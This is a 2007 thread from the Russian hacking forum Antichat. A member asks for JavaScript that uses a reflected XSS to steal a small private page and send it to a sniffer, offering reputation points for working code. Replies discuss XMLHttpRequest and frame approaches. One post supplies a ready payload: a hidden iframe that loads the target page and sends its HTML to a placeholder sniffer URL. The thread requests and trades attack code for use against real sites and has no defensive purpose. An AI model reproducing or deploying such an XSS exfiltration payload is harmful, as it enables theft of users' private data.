ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

(+50) Вопрос по Javascript
  #1  
Старый 19.05.2007, 16:31
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию (+50) Вопрос по Javascript

Gh0s7 попропрорпросил запостить

Собственно сабж. Есть вопрос по жс.
<Gh0s7> Ситуация такая:
<Gh0s7> Есть саент, на нем пассив гет хсс, длина неорграничена.
<Gh0s7> На том же саенте есть мааленькая страничка. Она очень маленькая, в одну строку, примерно 12-16 символов, полностью без хтмл.
<Gh0s7> Нужно через имеющуюся хсс слить эту страницу куда-нибудь, например на сниффер.
<Gh0s7> На сколько я знаю, это реально.
<Gh0s7> Тем, кто даст код +50 в репу (после того, как вернусь из отпуска, в понедельник)
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #2  
Старый 19.05.2007, 16:40
Аватар для Abra
Abra
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362

Репутация: 175
По умолчанию

через xss получить контент страницы? 0_о страница закрытая что ли? Типа для мемберов?
Думаю через XMLHttpRequest как-нить поколодовать можно. Отправить запрос на страницу, получить контент в качестве ответа, передать контент снифферу. Хотя хз.

Вариант 2:
Вставляем в уязвимую страницу фрейм с таргетом на закрытую страницу, и JS код который тырит контент фрейма (помоему innerHTML может из фрейма контент забрать?). ну и далее этот контент отправляем на снифак.

ЗЫ просто мысли в слух - надеюсь никто не против.

Последний раз редактировалось Abra; 19.05.2007 в 16:47..
 
Ответить с цитированием

  #3  
Старый 19.05.2007, 17:05
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Код:
<script src=""></script>
мб так? имхо минимальный размер)
__________________
 
Ответить с цитированием

  #4  
Старый 19.05.2007, 17:25
Аватар для invlose
invlose
Banned
Регистрация: 06.05.2007
Сообщений: 87
Провел на форуме:
1420517

Репутация: 230
По умолчанию

+toxa+=)
опередил
 
Ответить с цитированием

  #5  
Старый 19.05.2007, 17:32
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

А так не меньше?
Код HTML:
<frame src="">
 
Ответить с цитированием

  #6  
Старый 19.05.2007, 18:07
Аватар для invlose
invlose
Banned
Регистрация: 06.05.2007
Сообщений: 87
Провел на форуме:
1420517

Репутация: 230
По умолчанию

в случае фрейма должны быть одинаковые домены(тут тоже есть тонкость) фрейма и закрытой страницы


или нужно писать <frame src='javascript:......'> (не уверен что прокатит)

********
если я правильно понял про что вы ,
если нет-извините=)
 
Ответить с цитированием

  #7  
Старый 19.05.2007, 18:50
Аватар для V1k
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию

Код HTML:
<iframe id="i1" name="i1" style="display:none" src="http://that/we/wish/to.steal" onload="i1.onload='';i1.contentDocument.location='http://our/sniffer.script?data='+escape(i1.contentDocument.getElementsByTagName('html')[0].innerHTML)"></iframe>
Это будет работать, естественно, если не противоречит безопасности JavaScript, т.е. страница с xss и похищяемая должны иметь одинаковые протокол и домен.
 
Ответить с цитированием

  #8  
Старый 19.05.2007, 18:54
Аватар для V1k
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию

GreenBear, все таки
Цитата:
Сообщение от Gh0s7  
На том же саенте есть мааленькая страничка.
или
Цитата:
Сообщение от GreenBear  
код страницы, где ксс
?
 
Ответить с цитированием

  #9  
Старый 19.05.2007, 19:04
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Цитата:
Сообщение от V1k  
GreenBear, все таки

или
?
<Gh0s7> 'Не код страницы где хсс, а код той небольшой страницы, где 14-16 символов'
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #10  
Старый 19.05.2007, 19:21
Аватар для V1k
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию

омг, ты в курсе что событие onload в iframe происходит после того, как полностью загрузилась страница, указанная в его src?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос по JavaScript Mastermind С/С++, C#, Delphi, .NET, Asm 2 28.08.2005 16:38
Books JS FRAGNATIC PHP, PERL, MySQL, JavaScript 0 11.08.2005 16:57
Bypassing JavaScript Filters the Flash! Attack k00p3r Чужие Статьи 0 12.07.2005 16:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ